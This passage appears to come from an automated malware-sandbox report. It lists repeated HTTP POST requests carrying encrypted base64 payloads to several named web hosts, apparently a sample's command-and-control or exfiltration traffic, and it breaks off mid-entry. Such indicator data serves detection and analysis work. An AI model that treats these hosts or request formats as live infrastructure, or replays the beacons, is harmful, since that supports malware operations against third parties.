NS/ikpj2+vqB96m/mwlGDouR28BgBdjsTIN6LbVr+1iyh+88yfisj4kmwyGavlsTm/B4xzgxwF8SJFfGcyhwrrSgGeE4AXkky87DQOJcVgp8YiXAD3V1mK+R/g9D6XDhSLb3x8Z4pStsnmpAbsCpuVV4hXAj+OP8+Y63i8iTQQRrNNr+nNTj4DQpNp2jIaz/0fzfZFkPlAi4+JRpAtTUD7A1ebWI/PrwA5Fp0WpdE+RIacvTXWMVewCrAqmHaJieZHO0oS+GamYwccAUyf+/Qf0j8gbnj6R3Suxh6so38UUSqdo2Li2A+Olsys+aCMo3SDpts0gGEzfwo+lru9ylf+UkswS6v3eBDTq15Ag5NAPruI1FEq+P7Bx4gNBQ6FbbkLgsoe3CTMLsLh1J52CRQPvzL4pR6isvevaxyIMU6aJjn6dba4vpMuUMJwgbea8QzVAKV0uj2BQuWW8siXv3+vxkFzA27ZJyJww2yb08Ym2hAhLWBMI9g4hlwbMvAv3ndgMyiHrnVBLKfRCfAHjvCvWFMzlBJKNHWyKmnRZPaV3Gse9tl+XkZ6LBnIatwny3MwPp4g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 71 62 2b 72 6c 48 51 46 2b 2f 71 61 34 63 32 68 7a 33 4b 75 68 38 64 77 58 4d 70 73 77 7a 47 4f 36 4c 48 6e 2f 4d 46 32 6e 2f 46 4f 50 79 47 4c 79 45 38 30 62 4a 4e 77 33 71 79 70 4a 69 41 4b 4f 56 35 6e 57 56 31 71 45 61 56 54 44 39 52 61 68 44 2b 74 4a 6a 74 57 30 36 45 55 37 54 44 4c 33 50 31 2b 67 4b 68 6f 4c 4e 4f 57 33 79 78 4e 39 42 52 44 74 35 34 36 75 56 36 71 4b 48 72 43 69 6b 37 4b 31 71 64 62 77 75 76 55 2f 32 71 4b 42 2b 6f 32 69 4b 2f 35 4a 38 6f 79 70 62 68 66 78 6e 53 68 6a 78 75 4c 54 72 51 45 4c 2f 39 56 2b 32 35 4c 44 61 61 57 4a 4d 70 53 77 77 44 61 6f 72 4b 32 6a 54 4b 4f 48 33 55 38 47 57 59 49 6d 2f 76 71 72 49 7a 65 66 75 73 70 6c 54 68 44 74 50 52 4a 54 73 31 6e 75 32 56 68 4a 36 5a 69 43 31 49 47 35 69 45 6c 51 43 41 58 7a 30 4b 39 2b 52 4d 51 6d 62 33 39 55 45 51 70 68 71 33 54 6c 2f 50 42 71 53 52 35 4b 34 51 45 4e 31 73 59 74 44 4a 6b 31 66 75 64 50 6b 48 7a 6d 45 79 41 48 45 4a 42 4a 4c 37 58 33 63 6c 4f 41 57 65 67 4d 73 4b 57 75 47 61 61 72 6e 67 6d 55 30 72 37 63 7a 74 49 51 73 77 33 41 79 69 70 63 46 56 44 64 67 36 4d 7a 52 46 72 66 33 37 65 2b 32 42 51 4c 39 41 4b 47 32 49 31 4b 4f 58 56 47 4f 73 32 38 43 57 71 65 32 6a 50 53 78 51 58 7a 48 44 2b 42 54 51 6d 45 74 50 6a 4d 78 37 6c 34 4c 51 6f 4d 41 73 77 59 6f 4a 4c 41 5a 47 56 47 62 71 59 56 41 51 41 69 73 69 63 74 32 6c 5a 38 79 70 4b 4f 6e 6e 48 2f 75 48 57 52 77 35 75 44 32 30 33 6f 58 68 32 42 2b 4f 37 51 59 56 71 33 2f 4d 43 50 72 70 7a 75 41 54 67 54 4c 65 2f 6b 4a 4a 48 70 41 5a 6c 47 50 43 55 30 74 4a 77 38 34 41 7a 2f 37 51 31 55 46 6f 77 36 79 43 39 2b 50 70 47 6b 4d 7a 57 44 6f 58 53 55 4a 61 44 6f 32 49 5a 61 2b 71 38 42 61 67 67 61 30 6d 35 4f 31 50 58 51 67 53 4b 65 4a 2f 51 53 46 6f 75 57 6e 39 5a 76 62 31 47 62 65 4a 65 31 46 65 46 46 62 71 5a 65 75 4c 54 79 30 55 72 45 4e 6b 3d Data Ascii: qb+rlHQF+/qa4c2hz3Kuh8dwXMpswzGO6LHn/MF2n/FOPyGLyE80bJNw3qypJiAKOV5nWV1qEaVTD9RahD+tJjtW06EU7TDL3P1+gKhoLNOW3yxN9BRDt546uV6qKHrCik7K1qdbwuvU/2qKB+o2iK/5J8oypbhfxnShjxuLTrQEL/9V+25LDaaWJMpSwwDaorK2jTKOH3U8GWYIm/vqrIzefusplThDtPRJTs1nu2VhJ6ZiC1IG5iElQCAXz0K9+RMQmb39UEQphq3Tl/PBqSR5K4QEN1sYtDJk1fudPkHzmEyAHEJBJL7X3clOAWegMsKWuGaarngmU0r7cztIQsw3AyipcFVDdg6MzRFrf37e+2BQL9AKG2I1KOXVGOs28CWqe2jPSxQXzHD+BTQmEtPjMx7l4LQoMAswYoJLAZGVGbqYVAQAisict2lZ8ypKOnnH/uHWRw5uD203oXh2B+O7QYVq3/MCPrpzuATgTLe/kJJHpAZlGPCU0tJw84Az/7Q1UFow6yC9+PpGkMzWDoXSUJaDo2IZa+q8Bagga0m5O1PXQgSKeJ/QSFouWn9Zvb1GbeJe1FeFFbqZeuLTy0UrENk=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.baijaku.comCache-Control: no-cacheData Raw: 68 72 69 66 67 6d 31 76 2b 76 71 6b 44 38 4d 50 5a 41 6b 78 70 53 62 6d 68 69 46 62 65 2f 2f 32 38 57 37 69 54 44 4a 65 53 32 35 50 4c 58 33 33 65 61 39 2b 31 51 57 75 52 44 76 4a 4e 54 43 2f 34 50 44 7a 57 33 49 52 64 47 53 38 36 65 34 75 6a 54 4f 65 57 36 47 51 76 57 36 37 42 76 6c 35 50 52 44 63 41 4a 45 65 67 41 6b 38 77 61 31 35 64 52 64 36 70 6c 69 55 4c 56 70 4e 71 4c 33 6e 4c 6e 31 78 65 61 54 68 52 61 4b 79 4e 4a 6c 44 70 50 59 4b 7a 35 42 54 72 47 67 58 4c 63 31 63 57 4a 4a 39 6d 75 4e 53 69 49 68 73 4d 37 36 65 63 56 38 45 6d 4e 4c 41 65 47 42 72 4d 66 79 66 2b 6c 71 66 4b 76 44 56 47 44 61 54 51 6e 6c 51 43 38 42 75 38 55 49 41 35 6d 54 39 41 71 51 32 31 62 34 35 50 49 46 71 4b 6f 75 68 54 70 74 38 52 30 6f 50 68 6e 4d 70 2b 51 52 59 5a 69 36 37 39 32 63 39 36 7a 38 4c 75 57 51 68 61 77 46 67 54 67 38 66 69 71 41 6a 66 73 6d 41 50 31 58 74 72 49 6e 66 49 70 74 45 46 39 6a 63 52 4e 76 47 4c 35 37 79 4a 71 55 4e 43 66 42 46 7a 33 43 62 73 4a 35 4a 78 68 6c 49 37 42 48 77 44 50 45 74 57 32 5a 65 47 4e 42 52 72 34 35 78 59 51 6c 4f 6f 51 6c 75 7a 31 61 45 57 59 37 7a 56 31 49 51 72 31 42 6f 2f 6b 5a 50 57 30 31 52 48 54 67 5a 50 4e 6d 35 4d 51 54 6b 57 35 70 72 63 63 49 79 4b 2b 53 35 50 54 72 67 6a 58 63 39 71 6c 4a 33 4c 72 4c 46 79 33 78 62 6c 6b 62 79 5a 55 4f 51 59 56 64 62 72 35 32 69 44 37 58 62 30 61 49 70 76 62 74 45 6d 62 68 6a 78 39 61 35 51 74 57 79 36 6d 37 4f 6d 76 63 58 66 53 74 6d 43 75 74 6e 4d 50 2f 77 71 4c 4e 7a 56 66 74 46 54 7a 4e 45 34 30 32 37 6e 66 44 63 64 2f 59 70 6a 4a 55 52 75 69 50 4f 72 50 4a 69 4e 62 47 6c 57 59 51 4d 73 37 45 4e 6e 35 4a 62 78 56 4a 48 Data Ascii: hrifgm1v+vqkD8MPZAkxpSbmhiFbe//28W7iTDJeS25PLX33ea9+1QWuRDvJNTC/4PDzW3IRdGS86e4ujTOeW6GQvW67Bvl5PRDcAJEegAk8wa15dRd6pliULVpNqL3nLn1xeaThRaKyNJlDpPYKz5BTrGgXLc1cWJJ9muNSiIhsM76ecV8EmNLAeGBrMfyf+lqfKvDVGDaTQnlQC8Bu8UIA5mT9AqQ21b45PIFqKouhTpt8R0oPhnMp+QRYZi6792c96z8LuWQhawFgTg8fiqAjfsmAP1XtrInfIptEF9jcRNvGL57yJqUNCfBFz3CbsJ5JxhlI7BHwDPEtW2ZeGNBRr45xYQlOoQluz1aEWY7zV1IQr1Bo/kZPW01RHTgZPNm5MQTkW5prccIyK+S5PTrgjXc9qlJ3LrLFy3xblkbyZUOQYVdbr52iD7Xb0aIpvbtEmbhjx9a5QtWy6m7OmvcXfStmCutnMP/wqLNzVftFTzNE4027nfDcd/YpjJURuiPOrPJiNbGlWYQMs7ENn5JbxVJH
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 65 63 71 41 34 4f 5a 37 2f 66 70 67 50 4b 32 64 67 65 49 68 46 41 6d 65 66 64 58 47 5a 38 4e 63 65 71 34 50 4e 53 75 41 69 63 7a 45 6e 35 6c 56 43 36 6c 78 43 6c 51 62 72 4f 71 56 65 52 65 4e 33 52 47 6f 73 2f 77 42 57 7a 67 2b 46 6f 32 31 59 52 4f 7a 73 75 39 41 76 76 4a 50 7a 6a 37 48 64 69 39 32 39 55 56 2b 49 4e 35 59 66 56 56 52 5a 50 7a 6d 56 6b 57 73 67 47 41 74 6c 61 76 65 30 33 72 48 6e 57 46 51 59 67 7a 74 6e 6e 4d 7a 74 42 68 64 43 42 65 71 78 53 41 56 71 39 69 30 6f 4e 61 6b 2b 47 65 33 42 38 36 75 76 68 52 57 4a 30 2f 4e 46 51 4e 7a 50 36 2f 61 35 36 49 72 56 6f 6b 53 47 4d 6a 67 76 4a 64 43 67 66 32 6b 38 61 78 38 4f 48 58 71 75 7a 38 37 68 64 30 56 57 70 2b 50 5a 56 4f 4b 4d 6b 69 4f 41 73 6a 55 46 5a 64 42 64 42 4c 75 6c 30 4e 64 65 6d 2b 30 78 43 71 69 69 6c 79 34 32 39 77 52 58 48 73 48 4c 4f 45 41 2f 35 65 65 58 62 36 6a 42 68 49 46 4b 76 31 4c 50 54 34 4f 36 4c 4e 46 36 55 72 41 67 4a 65 77 38 66 47 50 45 2f 70 4e 45 44 30 72 44 53 35 73 2b 34 37 61 50 56 65 31 54 53 55 74 36 61 6f 58 50 58 75 71 34 30 45 57 65 56 66 55 4e 72 78 65 59 53 41 4b 66 54 53 47 55 2b 74 62 41 39 4b 33 49 54 59 79 6c 57 37 50 2b 79 67 75 59 35 37 37 56 4f 67 32 55 45 57 65 55 34 74 79 58 66 61 69 72 68 72 42 4f 6e 55 64 74 76 50 44 70 41 54 56 34 50 36 64 4e 46 6d 37 53 6d 56 35 35 39 38 56 67 57 49 52 74 68 4d 7a 2f 79 35 4c 58 59 68 52 6c 54 70 74 79 30 34 4d 59 45 71 79 79 45 50 79 2f 42 53 46 6a 79 32 39 33 61 53 64 72 74 57 63 53 33 54 6c 4f 44 6b 63 6d 6a 6b 68 65 73 2b 63 73 78 4b 5a 65 79 7a 73 65 4b 33 30 36 63 7a 57 72 54 78 47 78 38 45 5a 53 46 55 68 39 69 6c 35 6e 2f 75 6d 71 38 76 4b 62 37 44 48 48 31 56 61 69 31 54 6b 4d 70 66 65 41 43 59 33 34 56 73 3d Data Ascii: ecqA4OZ7/fpgPK2dgeIhFAmefdXGZ8Nceq4PNSuAiczEn5lVC6lxClQbrOqVeReN3RGos/wBWzg+Fo21YROzsu9AvvJPzj7Hdi929UV+IN5YfVVRZPzmVkWsgGAtlave03rHnWFQYgztnnMztBhdCBeqxSAVq9i0oNak+Ge3B86uvhRWJ0/NFQNzP6/a56IrVokSGMjgvJdCgf2k8ax8OHXquz87hd0VWp+PZVOKMkiOAsjUFZdBdBLul0Ndem+0xCqiily429wRXHsHLOEA/5eeXb6jBhIFKv1LPT4O6LNF6UrAgJew8fGPE/pNED0rDS5s+47aPVe1TSUt6aoXPXuq40EWeVfUNrxeYSAKfTSGU+tbA9K3ITYylW7P+yguY577VOg2UEWeU4tyXfairhrBOnUdtvPDpATV4P6dNFm7SmV5598VgWIRthMz/y5LXYhRlTpty04MYEqyyEPy/BSFjy293aSdrtWcS3TlODkcmjkhes+csxKZeyzseK306czWrTxGx8EZSFUh9il5n/umq8vKb7DHH1Vai1TkMpfeACY34Vs=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.rs-ag.comCache-Control: no-cacheData Raw: 5a 6a 54 59 34 63 68 33 46 76 75 64 7a 5a 46 74 43 37 6a 55 6f 6a 73 65 38 55 64 51 46 70 61 32 66 41 64 51 7a 75 56 4f 44 72 47 4b 77 57 4b 71 63 39 62 63 69 77 46 43 44 31 38 6b 59 56 55 45 31 43 7a 57 63 4e 52 63 6f 62 62 35 35 63 54 76 36 6b 75 74 47 6f 5a 6a 79 31 6d 4a 73 50 4e 4e 4c 52 73 32 39 4d 73 5a 35 33 36 65 4c 64 4c 57 47 5a 42 53 4c 4f 67 62 52 45 48 4d 42 49 2f 43 42 53 44 71 34 37 33 71 70 51 50 6d 76 31 2b 79 73 4f 72 71 63 74 47 73 76 4c 67 4c 59 78 4d 42 37 51 6f 4e 64 32 34 2b 71 56 76 70 6e 72 79 78 6e 42 73 52 35 58 2f 64 6b 67 46 59 49 4a 6a 79 69 43 77 34 33 31 66 52 70 37 35 33 6c 48 6e 42 6c 5a 6e 6d 63 67 54 44 55 4c 4b 6c 4b 6a 73 4e 41 70 37 6f 58 4f 63 33 49 54 4c 34 56 33 51 48 43 34 32 64 70 71 43 4f 70 43 58 71 56 5a 64 6e 5a 31 4d 37 78 55 6b 42 64 76 41 49 55 37 4d 2b 43 70 62 59 4a 7a 74 6f 34 74 33 4e 6c 74 41 50 75 42 36 2f 4f 62 35 39 71 73 74 78 44 7a 37 67 47 31 42 2b 58 49 72 4a 52 6e 61 37 36 65 6e 59 43 51 73 47 2b 68 37 45 6b 42 58 4c 42 56 6f 6e 6f 4f 50 63 79 39 47 54 39 73 61 50 61 61 57 4c 42 65 55 4e 57 4b 2f 35 57 56 38 4d 41 2f 6e 4e 50 52 57 59 4f 4e 4d 69 69 48 6b 72 52 6c 36 54 32 50 35 42 72 38 6d 2b 32 46 79 68 6f 6c 63 4b 38 61 64 67 64 6b 48 69 52 54 33 50 31 67 59 57 74 2f 6b 44 59 77 5a 54 6e 37 30 30 78 33 30 69 5a 4a 39 74 71 61 4b 44 53 46 6d 70 73 69 4c 67 76 54 42 36 37 46 5a 37 72 47 63 65 70 4c 63 43 68 74 64 32 69 36 70 46 75 52 6e 30 75 68 5a 4d 39 31 43 69 61 50 63 32 36 57 71 42 4e 78 4a 57 62 72 64 6e 30 51 50 37 6e 35 37 44 4d 78 47 75 70 78 31 48 4e 64 45 72 6d 68 73 52 70 62 77 68 43 37 4b 58 36 31 59 2b 33 54 64 37 70 36 4e 76 2b 67 30 57 30 2f 34 71 43 62 66 38 78 51 3d 3d Data Ascii: ZjTY4ch3FvudzZFtC7jUojse8UdQFpa2fAdQzuVODrGKwWKqc9bciwFCD18kYVUE1CzWcNRcobb55cTv6kutGoZjy1mJsPNNLRs29MsZ536eLdLWGZBSLOgbREHMBI/CBSDq473qpQPmv1+ysOrqctGsvLgLYxMB7QoNd24+qVvpnryxnBsR5X/dkgFYIJjyiCw431fRp753lHnBlZnmcgTDULKlKjsNAp7oXOc3ITL4V3QHC42dpqCOpCXqVZdnZ1M7xUkBdvAIU7M+CpbYJzto4t3NltAPuB6/Ob59qstxDz7gG1B+XIrJRna76enYCQsG+h7EkBXLBVonoOPcy9GT9saPaaWLBeUNWK/5WV8MA/nNPRWYONMiiHkrRl6T2P5Br8m+2FyholcK8adgdkHiRT3P1gYWt/kDYwZTn700x30iZJ9tqaKDSFmpsiLgvTB67FZ7rGcepLcChtd2i6pFuRn0uhZM91CiaPc26WqBNxJWbrdn0QP7n57DMxGupx1HNdErmhsRpbwhC7KX61Y+3Td7p6Nv+g0W0/4qCbf8xQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 2b 31 70 76 2b 65 51 37 46 2f 75 47 6c 69 69 76 66 39 57 39 46 37 65 67 44 50 6d 63 30 71 33 4f 57 46 2f 77 4c 4b 78 72 68 35 69 46 69 4a 62 50 4a 77 37 73 33 4c 69 2f 30 6f 52 35 2b 4c 4f 55 53 6e 31 5a 37 46 70 53 6b 68 57 79 4d 64 66 2b 43 6b 43 63 66 44 4c 54 6c 68 36 65 7a 6b 65 59 6a 75 6e 33 5a 76 76 55 72 32 34 2f 35 70 76 37 44 4b 2b 58 73 35 52 6c 61 6f 33 4a 37 63 7a 4c 64 2b 62 49 30 4c 6e 32 65 69 52 45 4f 33 4c 5a 4f 77 50 64 2f 5a 49 35 6a 59 58 4d 75 49 4a 76 5a 31 53 39 6f 78 37 64 78 6c 6d 33 69 77 30 62 32 30 59 31 73 68 70 68 43 66 6f 68 6c 6c 47 37 55 6a 62 7a 4d 51 59 46 6b 54 67 4d 52 32 35 75 64 35 30 4c 54 71 49 73 78 46 64 36 44 36 4d 53 6b 72 30 70 54 68 7a 57 2f 69 66 44 32 31 56 4d 34 78 7a 6f 64 5a 61 38 6e 39 67 55 5a 37 77 38 68 4b 67 71 65 34 59 37 54 31 70 32 37 37 56 72 44 39 38 30 62 7a 78 6c 2f 72 33 4e 2f 4f 42 5a 37 75 6e 38 34 30 4a 76 33 31 31 31 54 73 48 44 7a 6e 51 32 33 46 54 49 48 39 61 42 68 2b 62 4d 39 31 42 63 35 36 6d 78 47 77 50 65 47 58 49 64 35 43 74 53 58 6b 76 6e 53 68 6b 6a 6d 31 7a 4d 77 70 41 79 78 6f 6b 45 64 34 42 49 42 4d 58 53 4c 78 36 45 52 6f 34 78 48 6e 63 66 56 31 4b 56 68 74 31 73 4f 4e 67 69 36 52 47 54 62 38 44 72 61 37 4e 47 76 78 6a 4d 73 52 4b 49 72 4e 35 7a 51 74 72 79 32 6c 61 58 61 35 45 58 2b 65 79 78 59 4e 55 62 59 41 6c 63 47 6e 67 4c 2b 78 45 6d 32 6b 44 71 43 4c 67 79 58 31 4b 69 4e 2f 50 6f 64 6c 6d 39 64 49 6f 6b 50 5a 6f 32 59 64 5a 66 69 56 37 5a 66 6a 49 63 72 66 4c 45 58 6a 54 6f 37 41 79 50 73 68 38 4f 73 47 63 64 70 34 4a 4b 52 74 4b 4a 6c 39 32 6d 56 71 50 58 34 78 48 30 32 34 4b 41 72 79 6f 4e 77 78 4c 6f 37 75 64 65 45 2b 78 4a 77 77 3d 3d Data Ascii: +1pv+eQ7F/uGliivf9W9F7egDPmc0q3OWF/wLKxrh5iFiJbPJw7s3Li/0oR5+LOUSn1Z7FpSkhWyMdf+CkCcfDLTlh6ezkeYjun3ZvvUr24/5pv7DK+Xs5Rlao3J7czLd+bI0Ln2eiREO3LZOwPd/ZI5jYXMuIJvZ1S9ox7dxlm3iw0b20Y1shphCfohllG7UjbzMQYFkTgMR25ud50LTqIsxFd6D6MSkr0pThzW/ifD21VM4xzodZa8n9gUZ7w8hKgqe4Y7T1p277VrD980bzxl/r3N/OBZ7un840Jv3111TsHDznQ23FTIH9aBh+bM91Bc56mxGwPeGXId5CtSXkvnShkjm1zMwpAyxokEd4BIBMXSLx6ERo4xHncfV1KVht1sONgi6RGTb8Dra7NGvxjMsRKIrN5zQtry2laXa5EX+eyxYNUbYAlcGngL+xEm2kDqCLgyX1KiN/Podlm9dIokPZo2YdZfiV7ZfjIcrfLEXjTo7AyPsh8OsGcdp4JKRtKJl92mVqPX4xH024KAryoNwxLo7udeE+xJww==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 48 2f 6c 2b 35 41 2f 65 48 76 74 41 72 72 50 38 72 6a 54 78 2b 42 67 6e 78 68 4b 6c 6f 37 66 43 73 77 62 72 50 59 54 78 70 6c 73 6b 32 47 51 2f 61 32 37 70 69 62 67 50 61 76 6f 39 6b 47 59 6e 53 6b 71 70 48 4c 47 63 6d 59 31 31 37 74 65 57 2f 6d 45 33 32 4c 52 52 64 77 71 79 75 2b 57 55 35 4f 62 50 67 36 74 71 32 59 68 4a 7a 6e 32 58 55 39 68 54 35 4a 62 6a 4e 64 56 59 48 47 7a 49 31 69 39 63 33 75 59 69 73 4e 55 34 57 39 75 61 78 51 64 46 39 79 75 6c 77 6b 78 75 41 63 6e 42 39 34 2b 6c 50 6b 6b 33 6a 35 67 48 49 43 52 39 2b 42 64 41 5a 52 30 69 5a 55 6f 57 68 36 5a 65 6a 53 5a 35 67 55 57 48 69 74 42 71 49 36 4d 6b 76 30 43 4f 75 50 32 77 44 51 4c 51 6f 4b 79 69 4f 71 74 31 79 53 70 6e 52 69 43 6d 66 36 33 57 67 64 38 4a 55 75 33 65 79 5a 33 74 50 6b 4d 31 49 47 61 36 38 31 2f 47 53 65 58 74 2b 48 4c 48 65 74 4a 53 50 76 2f 62 37 71 76 74 35 49 65 61 65 78 62 30 42 62 4c 43 41 31 59 49 6c 62 6c 78 64 33 76 79 79 6e 4a 33 37 44 4c 4e 31 65 2b 6b 7a 51 46 55 43 70 44 47 36 41 71 44 70 47 59 75 58 44 44 6b 57 45 64 55 5a 66 66 31 72 74 79 4a 71 67 6a 75 4a 50 53 71 35 50 34 2b 6b 33 45 74 44 30 78 6d 32 69 58 77 79 41 66 73 69 6b 56 62 54 42 76 77 51 52 2b 4c 65 70 47 4d 43 31 6a 52 61 69 69 58 6a 5a 43 7a 42 54 55 59 50 42 45 69 62 4f 30 51 30 76 42 7a 76 58 53 36 75 6c 61 43 78 52 4a 45 6d 57 6f 67 59 79 54 38 31 43 61 72 34 68 33 42 4c 67 75 68 34 2b 52 6b 70 6a 33 6c 59 31 67 78 43 53 76 6d 33 38 70 72 66 4f 39 72 63 4b 34 49 30 6d 38 53 66 48 37 38 67 66 70 49 68 31 32 4f 35 64 66 38 4f 63 39 6d 5a 45 76 72 77 6f 75 6d 71 70 2b 6a 44 69 31 68 48 6a 30 67 65 4e 79 2b 4c 31 4b 2b 48 36 42 52 72 61 36 6a 63 32 61 30 33 41 72 75 39 45 50 39 70 4b 56 35 6e 39 6f 3d Data Ascii: H/l+5A/eHvtArrP8rjTx+BgnxhKlo7fCswbrPYTxplsk2GQ/a27pibgPavo9kGYnSkqpHLGcmY117teW/mE32LRRdwqyu+WU5ObPg6tq2YhJzn2XU9hT5JbjNdVYHGzI1i9c3uYisNU4W9uaxQdF9yulwkxuAcnB94+lPkk3j5gHICR9+BdAZR0iZUoWh6ZejSZ5gUWHitBqI6Mkv0COuP2wDQLQoKyiOqt1ySpnRiCmf63Wgd8JUu3eyZ3tPkM1IGa681/GSeXt+HLHetJSPv/b7qvt5Ieaexb0BbLCA1YIlblxd3vyynJ37DLN1e+kzQFUCpDG6AqDpGYuXDDkWEdUZff1rtyJqgjuJPSq5P4+k3EtD0xm2iXwyAfsikVbTBvwQR+LepGMC1jRaiiXjZCzBTUYPBEibO0Q0vBzvXS6ulaCxRJEmWogYyT81Car4h3BLguh4+Rkpj3lY1gxCSvm38prfO9rcK4I0m8SfH78gfpIh12O5df8Oc9mZEvrwoumqp+jDi1hHj0geNy+L1K+H6BRra6jc2a03Aru9EP9pKV5n9o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 4e 53 2f 69 6b 70 6a 32 2b 76 71 42 39 36 6d 2f 6d 77 6c 47 44 6f 75 52 32 38 42 67 42 64 6a 73 54 49 4e 36 4c 62 56 72 2b 31 69 79 68 2b 38 38 79 66 69 73 6a 34 6b 6d 77 79 47 61 76 6c 73 54 6d 2f 42 34 78 7a 67 78 77 46 38 53 4a 46 66 47 63 79 68 77 72 72 53 67 47 65 45 34 41 58 6b 6b 79 38 37 44 51 4f 4a 63 56 67 70 38 59 69 58 41 44 33 56 31 6d 4b 2b 52 2f 67 39 44 36 58 44 68 53 4c 62 33 78 38 5a 34 70 53 74 73 6e 6d 70 41 62 73 43 70 75 56 56 34 68 58 41 6a 2b 4f 50 38 2b 59 36 33 69 38 69 54 51 51 52 72 4e 4e 72 2b 6e 4e 54 6a 34 44 51 70 4e 70 32 6a 49 61 7a 2f 30 66 7a 66 5a 46 6b 50 6c 41 69 34 2b 4a 52 70 41 74 54 55 44 37 41 31 65 62 57 49 2f 50 72 77 41 35 46 70 30 57 70 64 45 2b 52 49 61 63 76 54 58 57 4d 56 65 77 43 72 41 71 6d 48 61 4a 69 65 5a 48 4f 30 6f 53 2b 47 61 6d 59 77 63 63 41 55 79 66 2b 2f 51 66 30 6a 38 67 62 6e 6a 36 52 33 53 75 78 68 36 73 6f 33 38 55 55 53 71 64 6f 32 4c 69 32 41 2b 4f 6c 73 79 73 2b 61 43 4d 6f 33 53 44 70 74 73 30 67 47 45 7a 66 77 6f 2b 6c 72 75 39 79 6c 66 2b 55 6b 73 77 53 36 76 33 65 42 44 54 71 31 35 41 67 35 4e 41 50 72 75 49 31 46 45 71 2b 50 37 42 78 34 67 4e 42 51 36 46 62 62 6b 4c 67 73 6f 65 33 43 54 4d 4c 73 4c 68 31 4a 35 32 43 52 51 50 76 7a 4c 34 70 52 36 69 73 76 65 76 61 78 79 49 4d 55 36 61 4a 6a 6e 36 64 62 61 34 76 70 4d 75 55 4d 4a 77 67 62 65 61 38 51 7a 56 41 4b 56 30 75 6a 32 42 51 75 57 57 38 73 69 58 76 33 2b 76 78 6b 46 7a 41 32 37 5a 4a 79 4a 77 77 32 79 62 30 38 59 6d 32 68 41 68 4c 57 42 4d 49 39 67 34 68 6c 77 62 4d 76 41 76 33 6e 64 67 4d 79 69 48 72 6e 56 42 4c 4b 66 52 43 66 41 48 6a 76 43 76 57 46 4d 7a 6c 42 4a 4b 4e 48 57 79 4b 6d 6e 52 5a 50 61 56 33 47 73 65 39 74 6c 2b 58 6b 5a 36 4c 42 6e 49 61 74 77 6e 79 33 4d 77 50 70 34 67 3d 3d Data Ascii: NS/ikpj2+vqB96m/mwlGDouR28BgBdjsTIN6LbVr+1iyh+88yfisj4kmwyGavlsTm/B4xzgxwF8SJFfGcyhwrrSgGeE4AXkky87DQOJcVgp8YiXAD3V1mK+R/g9D6XDhSLb3x8Z4pStsnmpAbsCpuVV4hXAj+OP8+Y63i8iTQQRrNNr+nNTj4DQpNp2jIaz/0fzfZFkPlAi4+JRpAtTUD7A1ebWI/PrwA5Fp0WpdE+RIacvTXWMVewCrAqmHaJieZHO0oS+GamYwccAUyf+/Qf0j8gbnj6R3Suxh6so38UUSqdo2Li2A+Olsys+aCMo3SDpts0gGEzfwo+lru9ylf+UkswS6v3eBDTq15Ag5NAPruI1FEq+P7Bx4gNBQ6FbbkLgsoe3CTMLsLh1J52CRQPvzL4pR6isvevaxyIMU6aJjn6dba4vpMuUMJwgbea8QzVAKV0uj2BQuWW8siXv3+vxkFzA27ZJyJww2yb08Ym2hAhLWBMI9g4hlwbMvAv3ndgMyiHrnVBLKfRCfAHjvCvWFMzlBJKNHWyKmnRZPaV3Gse9tl+XkZ6LBnIatwny3MwPp4g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 48 2f 6c 2b 35 41 2f 65 48 76 74 41 72 72 50 38 72 6a 54 78 2b 42 67 6e 78 68 4b 6c 6f 37 66 43 73 77 62 72 50 59 54 78 70 6c 73 6b 32 47 51 2f 61 32 37 70 69 62 67 50 61 76 6f 39 6b 47 59 6e 53 6b 71 70 48 4c 47 63 6d 59 31 31 37 74 65 57 2f 6d 45 33 32 4c 52 52 64 77 71 79 75 2b 57 55 35 4f 62 50 67 36 74 71 32 59 68 4a 7a 6e 32 58 55 39 68 54 35 4a 62 6a 4e 64 56 59 48 47 7a 49 31 69 39 63 33 75 59 69 73 4e 55 34 57 39 75 61 78 51 64 46 39 79 75 6c 77 6b 78 75 41 63 6e 42 39 34 2b 6c 50 6b 6b 33 6a 35 67 48 49 43 52 39 2b 42 64 41 5a 52 30 69 5a 55 6f 57 68 36 5a 65 6a 53 5a 35 67 55 57 48 69 74 42 71 49 36 4d 6b 76 30 43 4f 75 50 32 77 44 51 4c 51 6f 4b 79 69 4f 71 74 31 79 53 70 6e 52 69 43 6d 66 36 33 57 67 64 38 4a 55 75 33 65 79 5a 33 74 50 6b 4d 31 49 47 61 36 38 31 2f 47 53 65 58 74 2b 48 4c 48 65 74 4a 53 50 76 2f 62 37 71 76 74 35 49 65 